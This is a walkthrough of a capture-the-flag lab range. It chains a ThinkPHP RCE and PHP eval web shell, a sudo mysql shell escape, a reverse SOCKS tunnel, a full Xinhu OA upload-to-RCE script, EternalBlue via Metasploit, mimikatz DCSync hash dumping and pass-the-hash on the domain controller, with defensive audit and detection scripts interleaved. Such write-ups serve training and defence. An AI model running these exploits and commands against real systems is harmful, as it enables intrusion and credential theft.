Initial
flag01
The entry point is an XX power-supply remote management system at 39.99.228.114.
Scanning it with a ThinkPHP all-in-one exploitation tool reveals a vulnerability:
[+] http://39.99.136.167 的检测结果如下:
=====================================================================
[+] 目标存在tp5_construct_code_exec_1漏洞
Use the tool directly to get a shell:
http://39.99.228.114/shell.php
<?php phpinfo(); @eval($_POST['shell']); ?>
After connecting with AntSword (蚁剑), I found that privilege escalation was needed. The sudo rules for www-data:
Matching Defaults entries for www-data on ubuntu-web01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
(root) NOPASSWD: /usr/bin/mysql
Use mysql to read flag01:
(www-data:/tmp) $ sudo mysql -e '\! cat /root/flag/flag01.txt'
Congratulations!!! You found the first flag, the next flag may be in a server in the internal network.
flag01: flag{60b53231-
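The escalation above works because sudo lets www-data run /usr/bin/mysql as root without a password, and the mysql client's `\!` command then hands over a root shell. The Python below is an added example, not part of the original writeup: it parses `sudo -l` output like the one shown above and flags rules that run shell-escape-capable binaries as root. The binary list is an assumed, illustrative set rather than an exhaustive one, and the sample output is reconstructed from the lines above.

```python
import os
import re

# Assumed, illustrative set of binaries that hand the caller a root shell or an
# arbitrary file read when run under sudo (mysql's "\! <command>" client command
# is the one used on this box). Extend it from your own hardening baseline.
SHELL_ESCAPE_BINARIES = {
    "mysql", "vim", "vi", "nano", "less", "more", "man", "find", "awk",
    "perl", "python", "python3", "bash", "sh", "env", "tar",
}

# One rule line of `sudo -l` output, e.g. "(root) NOPASSWD: /usr/bin/mysql"
_RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*)$"
)


def audit_sudo_l(output: str) -> list:
    """Parse `sudo -l` output and return one finding per risky rule.

    A rule is risky when it runs as root (or ALL) and the command is either
    ALL or a binary known to offer a shell escape. NOPASSWD raises the
    severity: a web-shell user has no password to type, so the rule is
    usable from any foothold running as that account.
    """
    findings = []
    for line in output.splitlines():
        m = _RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # "(root : root)" -> "root"
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        cmd = m.group("cmd").strip()
        binary = "ALL" if cmd == "ALL" else os.path.basename(cmd.split()[0])
        if runas not in ("root", "ALL"):
            continue
        if binary == "ALL":
            reason = "unrestricted root command"
        elif binary in SHELL_ESCAPE_BINARIES:
            reason = f"{binary} can spawn a root shell (shell escape)"
        else:
            continue
        nopasswd = "NOPASSWD" in tags
        findings.append({
            "command": cmd,
            "nopasswd": nopasswd,
            "severity": "critical" if nopasswd else "high",
            "reason": reason,
        })
    return findings


# Constructed sample: the `sudo -l` output for www-data shown above.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on ubuntu-web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User www-data may run the following commands on ubuntu-web01:
    (root) NOPASSWD: /usr/bin/mysql
"""

if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE_SUDO_L):
        print(finding)
```

The fix on the host side is not to grant the web account root via sudo at all: give the application its own unprivileged database user and connect as that user, so no sudo rule is needed.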
flag02
Upload fscan and linux_x64_agent, and scan with fscan first:
(www-data:/var/www/html) $ ./fscan -h 172.22.1.0/24
172.22.1.2:88 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.18:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
[*] NetInfo
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] NetInfo
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] NetInfo
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] PocScan [http://172.22.1.15](http://172.22.1.15/) poc-yaml-thinkphp5023-method-rce poc1
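The fscan output above mixes port lines, NetBIOS/OS lines, web titles and vulnerability hits in one stream. As an added example that is not part of the original writeup or of fscan itself, the Python below parses those line types into a per-host inventory and produces a defender's triage list: the domain controller, hosts with a known exploitable flaw, and hosts on end-of-life Windows versions. The regexes are assumed to cover only the line formats seen in this run; the sample text is constructed from the lines above.

```python
import re
from urllib.parse import urlparse

# Line types seen in the fscan run above. Assumed to cover only these formats;
# other fscan lines (NetInfo blocks, banners) are ignored.
_PORT_RE = re.compile(r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+) open$")
_NETBIOS_RE = re.compile(
    r"^\[\*\] NetBios\s+(?P<ip>\S+)\s+(?P<dc>\[\+\] DC:)?(?P<host>\S+)\s+(?P<os>.+)$")
_OSINFO_RE = re.compile(r"^\[\*\] OsInfo\s+(?P<ip>\S+)\s+\((?P<os>.+)\)$")
_VULN_RE = re.compile(r"^\[\+\] (?P<name>MS\d{2}-\d{3})\s+(?P<ip>\S+)\s+\((?P<os>.+)\)$")
_WEB_RE = re.compile(
    r"^\[\*\] WebTitle\s+(?P<url>\S+)\s+code:(?P<code>\d+)\s+len:\d+\s+title:(?P<title>.*)$")
_POC_RE = re.compile(r"^\[\+\] PocScan\s+(?P<url>\S+)\s+(?P<poc>\S+)")


def _host(inv, ip):
    """Get or create the inventory record for one IP."""
    return inv.setdefault(ip, {"ports": set(), "hostname": None, "os": None,
                               "is_dc": False, "web": [], "vulns": []})


def parse_fscan(text):
    """Turn fscan's free-form output into an inventory keyed by IP."""
    inv = {}
    for raw in text.splitlines():
        line = raw.strip()
        if m := _PORT_RE.match(line):
            _host(inv, m["ip"])["ports"].add(int(m["port"]))
        elif m := _NETBIOS_RE.match(line):
            h = _host(inv, m["ip"])
            h["hostname"], h["os"], h["is_dc"] = m["host"], m["os"], bool(m["dc"])
        elif m := _OSINFO_RE.match(line):
            h = _host(inv, m["ip"])
            h["os"] = h["os"] or m["os"]
        elif m := _VULN_RE.match(line):
            h = _host(inv, m["ip"])
            h["vulns"].append(m["name"])
            h["os"] = h["os"] or m["os"]
        elif m := _WEB_RE.match(line):
            # fscan appends the redirect target after the title on 30x responses
            title = re.split(r"\s+跳转url:", m["title"])[0]
            _host(inv, urlparse(m["url"]).hostname)["web"].append(
                {"url": m["url"], "code": int(m["code"]), "title": title})
        elif m := _POC_RE.match(line):
            _host(inv, urlparse(m["url"]).hostname)["vulns"].append(m["poc"])
    for h in inv.values():
        h["ports"] = sorted(h["ports"])
    return inv


def triage(inv):
    """Defender-side priorities from the inventory: the DC, anything with a
    known exploitable flaw, and hosts on end-of-life Windows versions."""
    notes = []
    for ip, h in sorted(inv.items()):
        name = h["hostname"] or ip
        if h["is_dc"]:
            notes.append(f"{name}: domain controller, tier-0 asset, monitor first")
        for v in h["vulns"]:
            notes.append(f"{name}: flagged {v}, patch or isolate now")
        if any(tag in (h["os"] or "") for tag in ("2008", "2012")):
            notes.append(f"{name}: end-of-life Windows ({h['os']}), plan replacement")
    return notes


# Constructed sample: a subset of the scan lines shown above.
SAMPLE_FSCAN = """\
172.22.1.2:88 open
172.22.1.21:445 open
172.22.1.2:445 open
172.22.1.2:139 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
[*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
"""

if __name__ == "__main__":
    for note in triage(parse_fscan(SAMPLE_FSCAN)):
        print(note)
```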
Start a proxy on the VPS:
```shell
# VPS
./linux_x64_admin -l 6666
# target machine
./linux_x64_agent -c <ip>:<port>
```
[*] Starting admin node on port 6666
[ASCII-art banner omitted] { v2.2 Author:ph4ntom }
[*] Waiting for new connection...
[*] Connection from node 39.99.228.114:44284 is set up successfully! Node id is 0
(admin) >> use 0
(node 0) >> socks 15000
[*] Trying to listen on 0.0.0.0:15000......
[*] Waiting for agent's response......
[*] Error: listen tcp 0.0.0.0:15000: bind: address already in use
(node 0) >> socks 15001
[*] Trying to listen on 0.0.0.0:15001......
[*] Waiting for agent's response......
[*] Socks start successfully!
With Proxifier, or the proxychains4 that ships with Kali, services on the internal network can now be reached.
http://172.22.1.18?m=login is a Xinhu (信呼) collaborative OA system. The weak password admin/admin123 logs into the admin backend, and the system has a file upload vulnerability, so just find a PoC:
```python
import requests

session = requests.session()
url_pre = 'http://172.22.1.18'
url1 = url_pre + '/?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'

# Log in to the backend (values are base64 of admin / admin123)
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}
r = session.post(url1, data=data1)

# Upload the file; binary mode so the content is sent unchanged
with open('1.php', 'rb') as fh:
    r = session.post(url2, files={'file': fh})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
file_id = r.json()['id']
print(file_id)
print(filepath)

# Run the task for the uploaded file id, then request the resulting file
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={file_id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)
```
```text
//9
/upload/2025-04/10_13503074.php
<br />
<b>Notice</b>: Undefined offset: 1 in <b>C:\phpStudy\PHPTutorial\WWW\upload\2025-04\10_13503074.php</b> on line <b>1</b><br />
Process finished with exit code 0
```
Then, with the SOCKS proxy configured in AntSword, connect directly; flag02 is found at C:/Users/Administrator/flag/flag02.txt:
flag02: 2ce3-4813-87d4-
Awesome! ! ! You found the second flag, now you can attack the domain controller.
flag03
Configure the proxy for proxychains4, then use msf to exploit EternalBlue:
```shell
vim /etc/proxychains4.conf
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit
```
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.1.21:4444
[+] 172.22.1.21:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.22.1.21:445 - Sending egg to corrupted connection.
[*] 172.22.1.21:445 - Triggering free of corrupted buffer.
... OK
[*] Sending stage (203846 bytes) to 172.22.1.21
[proxychains] DLL init: proxychains-ng 4.17
[*] Meterpreter session 1 opened (192.168.1.102:37750 -> 156.238.233.21:15001) at 2025-04-10 14:04:50 +0800
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
meterpreter >
This shows the exploit landed; next, use mimikatz to collect the domain users' hashes:
```text
load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
```
meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ 300dfbf6006e83a7e27246328130f87d 532480
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1104 XIAORANG-OA01$ b55e337302b76f26b264ac7727cb9adf 4096
1108 XIAORANG-WIN7$ 55ba475072ff7532c01af709c4292864 4096
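The `lsadump::dcsync` step above pulls every account's hash by asking the DC to replicate, exactly as a second DC would; the only thing distinguishing it from legitimate replication is who asks. The Python below is an added detection example, not part of the original writeup or of any tool on this page: it reads Security event 4662 records from the DC and alerts when a replication control-access right is exercised by a principal that is neither a DC machine account nor an allowlisted sync account. The events are constructed placeholders (the NetBIOS domain name `XIAORANG` and the account names are assumed); the three replication GUIDs are the Microsoft-defined constants for those rights.

```python
import re
from dataclasses import dataclass

# Control-access-right GUIDs that grant directory replication; these are the
# rights DCSync relies on. They are Microsoft-defined schema constants.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
_GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)


@dataclass
class Event4662:
    """The Security event 4662 fields this check needs (names follow the
    event XML: Computer, SubjectDomainName, SubjectUserName, Properties)."""
    computer: str
    subject_domain: str
    subject_user: str
    properties: str


def detect_dcsync(events, dc_computer_accounts, allowed_replicators=()):
    """Return an alert for every 4662 that exercises a replication right on
    behalf of a principal that is not a DC machine account or an allowlisted
    replication service account.

    4662 is only written when the "Audit Directory Service Access"
    subcategory is enabled on the DCs and the domain object's SACL covers
    these rights; without that, this check sees nothing.
    """
    expected = {a.upper() for a in dc_computer_accounts}
    expected |= {a.upper() for a in allowed_replicators}
    alerts = []
    for ev in events:
        rights = [REPLICATION_RIGHTS[g.lower()]
                  for g in _GUID_RE.findall(ev.properties)
                  if g.lower() in REPLICATION_RIGHTS]
        if not rights:
            continue                      # ordinary object access, not replication
        principal = f"{ev.subject_domain}\\{ev.subject_user}".upper()
        if principal in expected or ev.subject_user.upper() in expected:
            continue                      # DC-to-DC replication or known sync account
        alerts.append({
            "dc": ev.computer,
            "principal": principal,
            "rights": rights,
            # Get-Changes-All is the right that returns secrets such as hashes
            "severity": "critical" if "DS-Replication-Get-Changes-All" in rights else "high",
        })
    return alerts


# Constructed sample events (placeholders, not logs from the machines above).
SAMPLE_EVENTS = [
    # Normal: DC01 replicating with a peer DC
    Event4662("DC01.xiaorang.lab", "XIAORANG", "DC01$",
              "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    # Normal: a user touching some other object property (placeholder GUID)
    Event4662("DC01.xiaorang.lab", "XIAORANG", "jdoe",
              "{deadbeef-0000-4000-8000-000000000001}"),
    # Suspicious: an ordinary service account pulling all changes
    Event4662("DC01.xiaorang.lab", "XIAORANG", "svc-backup",
              "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
]

if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS, dc_computer_accounts={"DC01$"}):
        print(alert)
```

The allowlist is the part to maintain carefully: in most domains only the DC computer accounts and a directory-synchronisation service account should ever hold these rights, so anything else appearing here is worth an immediate look at who granted the rights and when.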
Then use crackmapexec for pass-the-hash to take the domain controller:
┌──(root㉿kali-plus)-[~]
└─# proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
[*] Initializing SSH protocol database
[*] Initializing LDAP protocol database
[*] Initializing FTP protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.1.2:445 ... OK
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.1.2:135 ... OK
SMB 172.22.1.2 445 DC01 [*] Windows Server 2016 Datacenter 14393 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:True)
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.1.2:445 ... OK
SMB 172.22.1.2 445 DC01 [+] xiaorang.lab\administrator:10cf89a850fb1cdbe6bb432b859164c8 (Pwn3d!)
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.1.2:135 ... OK
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.1.2:49668 ... OK
SMB 172.22.1.2 445 DC01 [+] Executed command
SMB 172.22.1.2 445 DC01 [ASCII-art banner omitted]
SMB 172.22.1.2 445 DC01 flag03: e8f88d0d43d6}
SMB 172.22.1.2 445 DC01
SMB 172.22.1.2 445 DC01 Unbelievable! ! You found the last flag, which means you have full control over the entire domain network.
With flag03 e8f88d0d43d6}, the final flag is flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}.
Summary
The entry point is a ThinkPHP vulnerability; a ready-made tool gets a shell directly. Once inside, mysql can be run as root, which leads straight to flag01. Then upload fscan and the internal-network proxy tool and scan with fscan, which reveals three machines. One runs the Xinhu OA system, for which a PoC already exists; exploit it, upload a webshell, connect, and find flag02. For flag03, exploit EternalBlue on one of the machines, dump hashes with mimikatz once inside, and then crackmapexec takes the domain controller directly. This range is fairly easy; the main things to learn are internal-network proxying and what to do once inside the internal network.
